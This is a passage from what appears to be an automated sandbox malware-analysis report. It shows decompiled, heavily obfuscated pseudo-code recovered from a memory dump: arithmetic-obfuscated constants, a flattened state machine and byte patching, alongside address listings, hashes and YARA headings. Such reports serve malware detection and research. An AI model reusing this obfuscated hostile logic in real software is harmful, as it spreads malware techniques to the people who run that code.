				_v188 = _v188 + 0x42a7;
				_v188 = _v188 ^ 0x24c1907e;
				_v168 = 0x5bbfd5;
				_v168 = _v168 ^ 0xaf73a613;
				_v168 = _v168 * 0x43;
				_v168 = _v168 ^ 0xd77759df;
				_v132 = 0x7bc3bb;
				_v132 = _v132 + 0xfffff6ab;
				_v132 = _v132 ^ 0x00710d61;
				_v208 = 0xe6ee0d;
				_v208 = _v208 | 0x92091f4c;
				_v208 = _v208 >> 3;
				_v208 = _v208 * 0x61;
				_v208 = _v208 ^ 0xf59aa747;
				_v216 = 0x653a45;
				_v216 = _v216 * 0x3f;
				_v216 = _v216 + 0xffff4e97;
				_v216 = _v216 ^ 0x96b1be51;
				_v216 = _v216 ^ 0x8e5450e8;
				_v100 = 0xfd7786;
				_v100 = _v100 + 0xdb9a;
				_v100 = _v100 ^ 0x00fa5afe;
				_v116 = 0x47cdb0;
				_v116 = _v116 | 0x311992f4;
				_v116 = _v116 ^ 0x315f71c9;
				_v184 = 0xfc1676;
				_v184 = _v184 >> 4;
				_v184 = _v184 + 0xf942;
				_v184 = _v184 ^ 0x001256f7;
				_v192 = 0x4a7e97;
				_v192 = _v192 << 0xc;
				_v192 = _v192 + 0xffff97c8;
				_v192 = _v192 ^ 0xa7e5590e;
				_v108 = 0xa591e;
				_v108 = _v108 >> 0xd;
				_v108 = _v108 ^ 0x000f257c;
				_v176 = 0x7de015;
				_v176 = _v176 >> 3;
				_v176 = _v176 | 0x30b98b85;
				_v176 = _v176 ^ 0x30b5f870;
				_v144 = 0x9a82cf;
				_t455 = 0x2e;
				_v144 = _v144 * 0x54;
				_v144 = _v144 ^ 0x32beedd6;
				_v228 = 0x15eedb;
				_v228 = _v228 ^ 0x74b4188e;
				_v228 = _v228 + 0xffff6700;
				_v228 = _v228 + 0xcf4c;
				_v228 = _v228 ^ 0x74a119fc;
				_v156 = 0xd6eb4f;
				_v156 = _v156 ^ 0x50ac1b1c;
				_v156 = _v156 + 0xeec5;
				_v156 = _v156 ^ 0x5070863b;
				_v204 = 0x553780;
				_v204 = _v204 >> 1;
				_v204 = _v204 ^ 0x20338dbe;
				_v204 = _v204 >> 0xb;
				_v204 = _v204 ^ 0x0007c317;
				_v236 = 0xfd5340;
				_v236 = _v236 << 0xa;
				_v236 = _v236 ^ 0x416403b2;
				_v236 = _v236 * 0x67;
				_v236 = _v236 ^ 0x7c86c217;
				_v104 = 0x6a259;
				_v104 = _v104 * 0x24;
				_v104 = _v104 ^ 0x00ee0ac9;
				_v180 = 0x123564;
				_v180 = _v180 ^ 0x56196b0a;
				_v180 = _v180 >> 0xd;
				_v180 = _v180 ^ 0x000ca7a4;
				_v212 = 0xa6e89f;
				_v212 = _v212 << 3;
				_v212 = _v212 / _t455;
				_t456 = 0x43;
				_v212 = _v212 / _t456;
				_v212 = _v212 ^ 0x000fc1f5;
				_v148 = 0x6d0114;
				_v148 = _v148 | 0xf3e4699c;
				_v148 = _v148 ^ 0xf3ea1085;
				_v164 = 0x815c43;
				_v164 = _v164 >> 6;
				_v164 = _v164 ^ 0x421e5d43;
				_v164 = _v164 ^ 0x421d78e1;
				_v240 = 0xa2d65;
				_v240 = _v240 + 0xffff976c;
				_v240 = _v240 << 5;
				_v240 = _v240 << 5;
				_v240 = _v240 ^ 0x27113ac0;
				_v112 = 0x21947b;
				_t457 = 0x17;
				_v112 = _v112 / _t457;
				_v112 = _v112 ^ 0x000bf513;
				_v232 = 0xec1696;
				_v232 = _v232 + 0x18fb;
				_v232 = _v232 + 0xffff093e;
				_v232 = _v232 + 0xffff866b;
				_v232 = _v232 ^ 0x00e84135;
				_v172 = 0xd2924a;
				_v172 = _v172 + 0xffffa471;
				_v172 = _v172 * 0x67;
				_v172 = _v172 ^ 0x549231c4;
				_v224 = 0x486647;
				_v224 = _v224 >> 0xd;
				_v224 = _v224 | 0x5ff7df7d;
				_v224 = _v224 ^ 0x5fff12d6;
				_v152 = 0x7ee2b;
				_v152 = _v152 >> 9;
				_t458 = 0x3e;
				_v152 = _v152 / _t458;
				_v152 = _v152 ^ 0x0005a8cb;
				_v160 = 0x6a47dd;
				_t459 = 0x27;
				_v160 = _v160 * 0x36;
				_v160 = _v160 ^ 0xb21a04da;
				_v160 = _v160 ^ 0xa47e70e8;
				_v120 = 0xaabd8a;
				_v120 = _v120 + 0x4379;
				_v120 = _v120 ^ 0x00a453b8;
				_v128 = 0x317d8e;
				_v128 = _v128 * 0x1b;
				_v128 = _v128 ^ 0x0534d6ac;
				_v196 = 0xe1b0a4;
				_v196 = _v196 + 0xffffc8f3;
				_t460 = _v96;
				_v196 = _v196 / _t459;
				_v196 = _v196 ^ 0x0005c81a;
				_v200 = 0x9d0a1;
				_v200 = _v200 >> 0xb;
				_v200 = _v200 * 0x46;
				_v200 = _v200 >> 0xe;
				_v200 = _v200 ^ 0x00000081;
				goto L1;
				do {
					while(1) {
						L1:
						_t464 = _t404 - 0x6a00919;
						if(_t464 > 0) {
							break;
						}
						if(_t464 == 0) {
							_t450 =  *_t402;
							E001C316A(_v104, _v180, _v212, _t450);
							_t451 = _t450 + _v220;
							E001E2C81(_v148, _v92, _v164, _t451, _v240, _v88);
							_push(_v232);
							_t452 = _t451 + _v88;
							_push(_t460);
							E001DB0E0(_t452, _v112);
							_t444 =  &(_t452[_t460]);
							_t462 = _t462 + 0x20;
							_t417 = _t452;
							if(_t452 >= _t444) {
								L17:
								_push(_t417);
								_t390 = E001C2C02(0, 0xe);
								_t404 = 0xaf54993;
								 *((char*)(_t390 + _t452)) = 0;
								_t449 = _a4;
								continue;
							} else {
								goto L14;
							}
							do {
								L14:
								if(( *_t417 & 0x000000ff) == _v124) {
									 *_t417 = 0xc3;
								}
								_t417 =  &(_t417[1]);
							} while (_t417 < _t444);
							goto L17;
						}
						if(_t404 == 0x81e256) {
							E001CAE43(_v84, _v120, _v128);
							L30:
							return _v96;
						}
						if(_t404 == 0xc335b1) {
							_t404 = 0x3801220;
							continue;
						}
						if(_t404 == 0x13c9130) {
							_push(_t404);
							_push(_t404);
							_t396 = E001D5212( *((intOrPtr*)(_t402 + 4)));
							_t462 = _t462 + 0xc;
							 *_t402 = _t396;
							if(_t396 == 0) {
								_t404 = 0xaf54993;
							} else {
								_v96 = 1;
								_t404 = 0x6a00919;
							}
							continue;
						}
						if(_t404 != 0x3801220) {
							goto L27;
						}
						_t398 = E001DA29B(_v140,  *_t448,  &_v36, _v188, _v168, _v132,  *((intOrPtr*)(_t448 + 4)));
						_t462 = _t462 + 0x18;
						if(_t398 == 0) {
							goto L30;
						}
						_t404 = 0xfc30d66;
					}
					if(_t404 == 0xaf54993) {
						E001CAE43(_v92, _v152, _v160);
						_t404 = 0x81e256;
						goto L27;
					}
					if(_t404 == 0xbc74ee4) {
						_push(_t404);
						_t460 = E001C2C02(_v196, _v200);
						_t404 = 0x13c9130;
						 *((intOrPtr*)(_t402 + 4)) = _v136 + _v88 + _t460;
						goto L1;
					}
					if(_t404 == 0xfc30d66) {
						_v72 = _t449;
						_v52 =  &_v36;
						_v68 =  *_t448;
						_v64 =  *((intOrPtr*)(_t448 + 4));
						_v48 = 0x20;
						_t382 = E001C6453(_v208,  &_v84,  &_v76, _v216, _v100, _v116);
						_t462 = _t462 + 0x10;
						if(_t382 == 0) {
							goto L30;
						}
						_t404 = 0xfda96aa;
						goto L1;
					}
					if(_t404 != 0xfda96aa) {
						goto L27;
					}
					_t400 = E001C544C(_v184,  &_v84, _v192, _v108,  &_v92);
					_t462 = _t462 + 0xc;
					asm("sbb ecx, ecx");
					_t404 = ( ~_t400 & 0x0b456c8e) + 0x81e256;
					goto L1;
					L27:
				} while (_t404 != 0x4ce11cf);
				goto L30;
			}












































































                          0x001c84f7
                          0x001c8500
                          0x001c8508
                          0x001c850f
                          0x001c8510
                          0x001c8517
                          0x001c8518
                          0x001c8519
                          0x001c851a
                          0x001c851b
                          0x001c8520
                          0x001c852b
                          0x001c852e
                          0x001c8538
                          0x001c8543
                          0x001c8548
                          0x001c8550
                          0x001c8558
                          0x001c8560
                          0x001c856f
                          0x001c8572
                          0x001c857a
                          0x001c857e
                          0x001c858e
                          0x001c8592
                          0x001c859a
                          0x001c85a2
                          0x001c85a6
                          0x001c85a9
                          0x001c85ad
                          0x001c85b5
                          0x001c85bd
                          0x001c85c5
                          0x001c85cd
                          0x001c85d5
                          0x001c85dd
                          0x001c85ea
                          0x001c85ee
                          0x001c85f6
                          0x001c8601
                          0x001c860c
                          0x001c8617
                          0x001c861f
                          0x001c8627
                          0x001c8631
                          0x001c8635
                          0x001c863d
                          0x001c864a
                          0x001c864e
                          0x001c8656
                          0x001c865e
                          0x001c8666
                          0x001c8671
                          0x001c867c
                          0x001c8687
                          0x001c8692
                          0x001c869d
                          0x001c86a8
                          0x001c86b0
                          0x001c86b5
                          0x001c86bd
                          0x001c86c5
                          0x001c86cd
                          0x001c86d2
                          0x001c86da
                          0x001c86e2
                          0x001c86ed
                          0x001c86f7
                          0x001c8702
                          0x001c870a
                          0x001c870f
                          0x001c8717
                          0x001c871f
                          0x001c872e
                          0x001c8731
                          0x001c8735
                          0x001c873d
                          0x001c8745
                          0x001c874d
                          0x001c8755
                          0x001c875d
                          0x001c8765
                          0x001c876d
                          0x001c8775
                          0x001c877d
                          0x001c8785
                          0x001c878d
                          0x001c8791
                          0x001c8799
                          0x001c879e
                          0x001c87a6
                          0x001c87ae
                          0x001c87b3
                          0x001c87c0
                          0x001c87c4
                          0x001c87cc
                          0x001c87df
                          0x001c87e6
                          0x001c87f1
                          0x001c87f9
                          0x001c8801
                          0x001c8806
                          0x001c880e
                          0x001c8816
                          0x001c8823
                          0x001c882b
                          0x001c8830
                          0x001c8836
                          0x001c883e
                          0x001c8846
                          0x001c884e
                          0x001c8856
                          0x001c885e
                          0x001c8863
                          0x001c886b
                          0x001c8873
                          0x001c887b
                          0x001c8883
                          0x001c8888
                          0x001c888d
                          0x001c8895
                          0x001c88a7
                          0x001c88aa
                          0x001c88b1
                          0x001c88bc
                          0x001c88c4
                          0x001c88cc
                          0x001c88d4
                          0x001c88dc
                          0x001c88e4
                          0x001c88ec
                          0x001c88f9
                          0x001c88ff
                          0x001c8907
                          0x001c890f
                          0x001c8914
                          0x001c891c
                          0x001c8924
                          0x001c892c
                          0x001c8937
                          0x001c893c
                          0x001c8942
                          0x001c894a
                          0x001c8957
                          0x001c8958
                          0x001c895c
                          0x001c8964
                          0x001c896c
                          0x001c8977
                          0x001c8982
                          0x001c898d
                          0x001c89a0
                          0x001c89a7
                          0x001c89b2
                          0x001c89ba
                          0x001c89c8
                          0x001c89cf
                          0x001c89d3
                          0x001c89db
                          0x001c89e3
                          0x001c89ed
                          0x001c89f1
                          0x001c89f6
                          0x001c89f6
                          0x001c89fe
                          0x001c89fe
                          0x001c89fe
                          0x001c89fe
                          0x001c8a04
                          0x00000000
                          0x00000000
                          0x001c8a0a
                          0x001c8ac2
                          0x001c8ad4
                          0x001c8add
                          0x001c8afd
                          0x001c8b02
                          0x001c8b06
                          0x001c8b16
                          0x001c8b17
                          0x001c8b1c
                          0x001c8b1f
                          0x001c8b22
                          0x001c8b26
                          0x001c8b3c
                          0x001c8b46
                          0x001c8b49
                          0x001c8b50
                          0x001c8b55
                          0x001c8b59
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x001c8b28
                          0x001c8b28
                          0x001c8b32
                          0x001c8b34
                          0x001c8b34
                          0x001c8b37
                          0x001c8b38
                          0x00000000
                          0x001c8b28
                          0x001c8a16
                          0x001c8cb4
                          0x001c8cba
                          0x001c8ccb
                          0x001c8ccb
                          0x001c8a22
                          0x001c8ab8
                          0x00000000
                          0x001c8ab8
                          0x001c8a2e
                          0x001c8a86
                          0x001c8a87
                          0x001c8a8b
                          0x001c8a90
                          0x001c8a93
                          0x001c8a97
                          0x001c8aae
                          0x001c8a99
                          0x001c8a99
                          0x001c8aa4
                          0x001c8aa4
                          0x00000000
                          0x001c8a97
                          0x001c8a36
                          0x00000000
                          0x00000000
                          0x001c8a5f
                          0x001c8a64
                          0x001c8a69
                          0x00000000
                          0x00000000
                          0x001c8a6f
                          0x001c8a6f
                          0x001c8b6b
                          0x001c8c86
                          0x001c8c8c
                          0x00000000
                          0x001c8c8c
                          0x001c8b77
                          0x001c8c48
                          0x001c8c56
                          0x001c8c6a
                          0x001c8c6f
                          0x00000000
                          0x001c8c6f
                          0x001c8b83
                          0x001c8bdc
                          0x001c8bea
                          0x001c8c02
                          0x001c8c0c
                          0x001c8c1b
                          0x001c8c26
                          0x001c8c2b
                          0x001c8c30
                          0x00000000
                          0x00000000
                          0x001c8c36
                          0x00000000
                          0x001c8c36
                          0x001c8b8b
                          0x00000000
                          0x00000000
                          0x001c8baf
                          0x001c8bb4
                          0x001c8bbb
                          0x001c8bc3
                          0x00000000
                          0x001c8c91
                          0x001c8c91
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: $5A$E:e$GfH$aq$e-$ee$yC
                          • API String ID: 0-3344464735
                          • Opcode ID: 45730276a8462984ee385fd950f205e3bdfa535a6e1d1655b427a2fe2de1701f
                          • Instruction ID: 107551425afc5014be2eb2846ecda07564af9509a5e6e334a2ddaaed71d7898b
                          • Opcode Fuzzy Hash: 45730276a8462984ee385fd950f205e3bdfa535a6e1d1655b427a2fe2de1701f
                          • Instruction Fuzzy Hash: 0F1211715093808FC368CF25C58AA9BFBE1FBD5708F10891DE2D98A260DBB19949CF47
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001C243F, Relevance: 10.3, Strings: 8, Instructions: 329COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 96%
                          			E001C243F() {
				char _v524;
				signed int _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _t360;
				signed int _t370;
				intOrPtr _t371;
				void* _t374;
				void* _t376;
				void* _t379;
				char _t386;
				void* _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int* _t436;

				_t436 =  &_v700;
				_v644 = 0x6bdfd1;
				_v644 = _v644 ^ 0x979670b7;
				_t376 = 0xb677678;
				_v644 = _v644 ^ 0xe993d947;
				_v644 = _v644 ^ 0x7e6e7620;
				_v600 = 0xd44612;
				_v600 = _v600 | 0xd6032db3;
				_v600 = _v600 ^ 0xd6d76eb3;
				_v608 = 0x321328;
				_v608 = _v608 >> 3;
				_v608 = _v608 ^ 0x00064266;
				_v588 = 0x1dc3e4;
				_v588 = _v588 >> 7;
				_v588 = _v588 ^ 0x00003b87;
				_v676 = 0xca28c5;
				_t422 = 0x7e;
				_v676 = _v676 / _t422;
				_v676 = _v676 | 0xa39659f7;
				_t421 = 0;
				_v676 = _v676 ^ 0x9bdf3521;
				_v676 = _v676 ^ 0x38462660;
				_v576 = 0xa1f767;
				_v576 = _v576 ^ 0x30e8e272;
				_v576 = _v576 ^ 0x30437e3f;
				_v636 = 0x30193b;
				_v636 = _v636 | 0xf98ebf42;
				_v636 = _v636 + 0x465a;
				_v636 = _v636 ^ 0xf9b7d3fa;
				_v628 = 0xf8a9c2;
				_v628 = _v628 + 0xffff9b4a;
				_v628 = _v628 ^ 0x6f3e3305;
				_v628 = _v628 ^ 0x6fc79a5a;
				_v580 = 0x34221d;
				_t423 = 0x6c;
				_v580 = _v580 * 0x72;
				_v580 = _v580 ^ 0x17329e1c;
				_v592 = 0x46a854;
				_v592 = _v592 / _t423;
				_v592 = _v592 ^ 0x0007e2d0;
				_v620 = 0x648007;
				_v620 = _v620 | 0x9fe7b715;
				_v620 = _v620 ^ 0x9fe05ac1;
				_v596 = 0x398eba;
				_v596 = _v596 ^ 0x9c50c709;
				_v596 = _v596 ^ 0x9c6d9ce7;
				_v656 = 0x78fbe3;
				_v656 = _v656 ^ 0x2a394479;
				_v656 = _v656 << 0xf;
				_v656 = _v656 ^ 0xdfce0ee6;
				_v604 = 0x877df3;
				_v604 = _v604 << 0x10;
				_v604 = _v604 ^ 0x7df4962b;
				_v668 = 0xe3c70c;
				_v668 = _v668 + 0xffff4197;
				_v668 = _v668 ^ 0x05e9e866;
				_v668 = _v668 << 6;
				_v668 = _v668 ^ 0x42b90c9e;
				_v584 = 0x266e86;
				_t424 = 0x57;
				_v584 = _v584 / _t424;
				_v584 = _v584 ^ 0x0003ff1f;
				_v632 = 0x9b2ca7;
				_v632 = _v632 >> 0xd;
				_v632 = _v632 * 0xd;
				_v632 = _v632 ^ 0x000bc767;
				_v640 = 0x866b44;
				_v640 = _v640 >> 3;
				_v640 = _v640 / _t424;
				_v640 = _v640 ^ 0x000c4f6e;
				_v612 = 0xa7dbb0;
				_t425 = 0x64;
				_v612 = _v612 / _t425;
				_v612 = _v612 ^ 0x00021f99;
				_v660 = 0x73f9e8;
				_t426 = 0x2d;
				_v660 = _v660 / _t426;
				_v660 = _v660 << 0xf;
				_v660 = _v660 ^ 0xc81ec68f;
				_v660 = _v660 ^ 0x81f41619;
				_v648 = 0x3a909a;
				_v648 = _v648 | 0x97e2c35a;
				_v648 = _v648 ^ 0xba86c636;
				_v648 = _v648 ^ 0x2d7c8adf;
				_v684 = 0x48be9e;
				_v684 = _v684 << 5;
				_t427 = 0x38;
				_v684 = _v684 * 0x4e;
				_v684 = _v684 + 0x761d;
				_v684 = _v684 ^ 0xc540ef8d;
				_v692 = 0xdf149e;
				_v692 = _v692 + 0x6a74;
				_v692 = _v692 ^ 0xeda6358b;
				_v692 = _v692 / _t427;
				_v692 = _v692 ^ 0x043a92ab;
				_v700 = 0x93dbf7;
				_t428 = 0x63;
				_v700 = _v700 * 0x3a;
				_v700 = _v700 / _t428;
				_t429 = 0x46;
				_v700 = _v700 / _t429;
				_v700 = _v700 ^ 0x000b92b0;
				_v680 = 0x8c923f;
				_v680 = _v680 | 0xccd3540a;
				_v680 = _v680 + 0x1565;
				_v680 = _v680 << 0xa;
				_v680 = _v680 ^ 0x7fa7961b;
				_v672 = 0x35bac0;
				_v672 = _v672 * 0x3b;
				_v672 = _v672 | 0x58738310;
				_v672 = _v672 * 0x25;
				_v672 = _v672 ^ 0x5cb4f925;
				_v688 = 0x377abe;
				_v688 = _v688 << 0xe;
				_v688 = _v688 + 0xa60e;
				_v688 = _v688 + 0xffffc1e2;
				_v688 = _v688 ^ 0xdeab84d7;
				_v652 = 0xa7878e;
				_v652 = _v652 + 0x1c57;
				_t430 = 0x12;
				_v652 = _v652 / _t430;
				_v652 = _v652 ^ 0x0003c11d;
				_v664 = 0x5b36fc;
				_v664 = _v664 + 0x818f;
				_v664 = _v664 << 7;
				_v664 = _v664 ^ 0x5d500fca;
				_v664 = _v664 ^ 0x70881f80;
				_v696 = 0x90a36e;
				_v696 = _v696 ^ 0xdcc3f2e8;
				_v696 = _v696 + 0xe5e9;
				_v696 = _v696 | 0x46a1024e;
				_v696 = _v696 ^ 0xdef79675;
				_v616 = 0x1c8a85;
				_v616 = _v616 << 0xd;
				_t431 = 0xe;
				_v616 = _v616 / _t431;
				_v616 = _v616 ^ 0x0a61a4ac;
				_v624 = 0xfaa176;
				_t432 = 0x76;
				_v624 = _v624 / _t432;
				_t433 = 0x55;
				_t375 = _v612;
				_v624 = _v624 / _t433;
				_v624 = _v624 ^ 0x000fa73f;
				do {
					while(_t376 != 0x24eee0d) {
						if(_t376 == 0x4039ddf) {
							_v572 = _v572 - E001CCE0E(_t376);
							_t376 = 0x24eee0d;
							asm("sbb [esp+0x94], edx");
							continue;
						} else {
							if(_t376 == 0x4d73541) {
								E001D4A33(_v616, _v624, _t375);
							} else {
								if(_t376 == 0x728cc3d) {
									_t419 = _v576;
									E001E1C21(_v676, _v576,  &_v572, _v636, _v628);
									_t436 =  &(_t436[3]);
									_t376 = 0x4039ddf;
									continue;
								} else {
									if(_t376 == 0x7671ba8) {
										_t370 = E001DB302( &_v524, _t419, _v648, _v684, _v600, 0, _v608, _v692, _t376, _v700, _v680, _v672, _v644);
										_t375 = _t370;
										_t436 =  &(_t436[0xb]);
										__eflags = _t370 - 0xffffffff;
										if(__eflags != 0) {
											_t376 = 0xa69e27e;
											continue;
										}
									} else {
										if(_t376 == 0xa69e27e) {
											_t386 = _v572;
											_t371 = _v568;
											_push(_t386);
											_v560 = _t371;
											_v552 = _t371;
											_v544 = _t371;
											_v536 = _t371;
											_v532 = _v588;
											_v564 = _t386;
											_v556 = _t386;
											_v548 = _t386;
											_v540 = _t386;
											_t374 = E001D4B76(_v688, _t419, _v652, _v664,  &_v564, _v696, _t375);
											_t436 =  &(_t436[6]);
											__eflags = _t374;
											_t421 =  !=  ? 1 : _t421;
											_t376 = 0x4d73541;
											continue;
										} else {
											if(_t376 != 0xb677678) {
												goto L15;
											} else {
												_t376 = 0x728cc3d;
												continue;
											}
										}
									}
								}
							}
						}
						L18:
						return _t421;
					}
					_push(_v620);
					_push(_v592);
					_t360 = E001DCD35(0x1c1000, _v580, __eflags);
					_pop(_t379);
					_t434 = _t360;
					_t417 =  *0x1e5218;
					__eflags =  *0x1e5218 + 0x234;
					E001D2EA5( *0x1e5218 + 0x234,  *0x1e5218 + 0x234, _t417 + 0x18, _t379, _v656, _v604, _t434, _v668, _v584,  &_v524);
					_t419 = _t434;
					E001D629F(_v632, _t434, _v640, _v612, _v660);
					_t436 =  &(_t436[0xb]);
					_t376 = 0x7671ba8;
					L15:
					__eflags = _t376 - 0x53cf906;
				} while (__eflags != 0);
				goto L18;
			}





































































                          0x001c243f
                          0x001c2445
                          0x001c244f
                          0x001c2457
                          0x001c245c
                          0x001c2464
                          0x001c246c
                          0x001c2474
                          0x001c247c
                          0x001c2484
                          0x001c248c
                          0x001c2491
                          0x001c2499
                          0x001c24a1
                          0x001c24a6
                          0x001c24ae
                          0x001c24c0
                          0x001c24c5
                          0x001c24cb
                          0x001c24d3
                          0x001c24d5
                          0x001c24dd
                          0x001c24e5
                          0x001c24f0
                          0x001c24fb
                          0x001c2506
                          0x001c250e
                          0x001c2516
                          0x001c251e
                          0x001c2526
                          0x001c252e
                          0x001c2536
                          0x001c253e
                          0x001c2546
                          0x001c2559
                          0x001c255c
                          0x001c2563
                          0x001c256e
                          0x001c2584
                          0x001c258b
                          0x001c2596
                          0x001c259e
                          0x001c25a6
                          0x001c25ae
                          0x001c25b6
                          0x001c25be
                          0x001c25c6
                          0x001c25ce
                          0x001c25d6
                          0x001c25db
                          0x001c25e3
                          0x001c25eb
                          0x001c25f0
                          0x001c25f8
                          0x001c2600
                          0x001c2608
                          0x001c2610
                          0x001c2615
                          0x001c261d
                          0x001c262f
                          0x001c2632
                          0x001c2639
                          0x001c2644
                          0x001c264c
                          0x001c2656
                          0x001c265c
                          0x001c2664
                          0x001c266c
                          0x001c2679
                          0x001c267f
                          0x001c2687
                          0x001c2693
                          0x001c2698
                          0x001c269e
                          0x001c26a6
                          0x001c26b2
                          0x001c26b7
                          0x001c26bd
                          0x001c26c2
                          0x001c26ca
                          0x001c26d2
                          0x001c26da
                          0x001c26e2
                          0x001c26ea
                          0x001c26f2
                          0x001c26fa
                          0x001c2704
                          0x001c2707
                          0x001c270b
                          0x001c2713
                          0x001c271b
                          0x001c2723
                          0x001c272b
                          0x001c273b
                          0x001c273f
                          0x001c2747
                          0x001c2754
                          0x001c2757
                          0x001c2763
                          0x001c276b
                          0x001c276e
                          0x001c2772
                          0x001c277a
                          0x001c2782
                          0x001c278a
                          0x001c2792
                          0x001c2797
                          0x001c279f
                          0x001c27ac
                          0x001c27b0
                          0x001c27bd
                          0x001c27c1
                          0x001c27c9
                          0x001c27d1
                          0x001c27d6
                          0x001c27de
                          0x001c27e6
                          0x001c27ee
                          0x001c27f6
                          0x001c280b
                          0x001c2810
                          0x001c2816
                          0x001c281e
                          0x001c2826
                          0x001c282e
                          0x001c2833
                          0x001c283b
                          0x001c2843
                          0x001c284b
                          0x001c2853
                          0x001c285b
                          0x001c2863
                          0x001c286b
                          0x001c2873
                          0x001c287c
                          0x001c2881
                          0x001c2887
                          0x001c288f
                          0x001c289b
                          0x001c28a0
                          0x001c28aa
                          0x001c28ad
                          0x001c28b1
                          0x001c28b5
                          0x001c28bd
                          0x001c28bd
                          0x001c28cf
                          0x001c2a18
                          0x001c2a1f
                          0x001c2a24
                          0x00000000
                          0x001c28d5
                          0x001c28db
                          0x001c2ac8
                          0x001c28e1
                          0x001c28e3
                          0x001c29f5
                          0x001c2a01
                          0x001c2a06
                          0x001c2a09
                          0x00000000
                          0x001c28e9
                          0x001c28ef
                          0x001c29c9
                          0x001c29ce
                          0x001c29d0
                          0x001c29d3
                          0x001c29d6
                          0x001c29dc
                          0x00000000
                          0x001c29dc
                          0x001c28f5
                          0x001c28fb
                          0x001c290d
                          0x001c2914
                          0x001c291b
                          0x001c291d
                          0x001c2924
                          0x001c292b
                          0x001c2932
                          0x001c2944
                          0x001c2957
                          0x001c2962
                          0x001c2969
                          0x001c2970
                          0x001c297b
                          0x001c2982
                          0x001c2986
                          0x001c2988
                          0x001c298b
                          0x00000000
                          0x001c28fd
                          0x001c2903
                          0x00000000
                          0x001c2909
                          0x001c2909
                          0x00000000
                          0x001c2909
                          0x001c2903
                          0x001c28fb
                          0x001c28ef
                          0x001c28e3
                          0x001c28db
                          0x001c2ace
                          0x001c2ada
                          0x001c2ada
                          0x001c2a30
                          0x001c2a39
                          0x001c2a47
                          0x001c2a4d
                          0x001c2a4e
                          0x001c2a6f
                          0x001c2a80
                          0x001c2a87
                          0x001c2a90
                          0x001c2aa4
                          0x001c2aa9
                          0x001c2aac
                          0x001c2ab1
                          0x001c2ab1
                          0x001c2ab1
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: vn~$?~C0$ZF$`&F8$tj$yD9*$~i$~i
                          • API String ID: 0-1622661322
                          • Opcode ID: d4054f7e25987ff8812a4d44124e5b09b05ee5eda81948fec0a90217dbc24dc9
                          • Instruction ID: 296df6b9e6b5ea714c5ac7ddbf254dfbbb4e775b1b1dee274310f17af05fc93d
                          • Opcode Fuzzy Hash: d4054f7e25987ff8812a4d44124e5b09b05ee5eda81948fec0a90217dbc24dc9
                          • Instruction Fuzzy Hash: 6DF1F1715093809FD368CF66C949A4BBBF2FBC4758F10891DF29A86260D7B58909CF83
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001DB677, Relevance: 10.3, Strings: 8, Instructions: 309COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 94%
                          			E001DB677(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				void* _t325;
				void* _t355;
				void* _t358;
				intOrPtr _t365;
				intOrPtr* _t366;
				void* _t368;
				intOrPtr _t393;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				void* _t404;
				void* _t405;

				_t395 = _a8;
				_t366 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001C358A(_t325);
				_v12 = 0xab9d1;
				_t393 = 0;
				_v8 = 0;
				_t405 = _t404 + 0x18;
				_v72 = 0x7e0a00;
				_v72 = _v72 << 1;
				_t368 = 0xe28fb16;
				_v72 = _v72 >> 0xa;
				_v72 = _v72 ^ 0x00003f04;
				_v44 = 0xe02806;
				_v44 = _v44 << 0x10;
				_v44 = _v44 ^ 0x28060001;
				_v116 = 0x28ec3f;
				_t20 =  &_v116; // 0x28ec3f
				_t396 = 0x6f;
				_v116 =  *_t20 / _t396;
				_t397 = 0x25;
				_v116 = _v116 / _t397;
				_v116 = _v116 + 0xffff36e4;
				_v116 = _v116 ^ 0xffff3971;
				_v80 = 0x2e26f9;
				_t398 = 0x64;
				_v80 = _v80 * 0x45;
				_v80 = _v80 + 0xffff4162;
				_v80 = _v80 ^ 0x0c6fc27f;
				_v100 = 0xb1aef7;
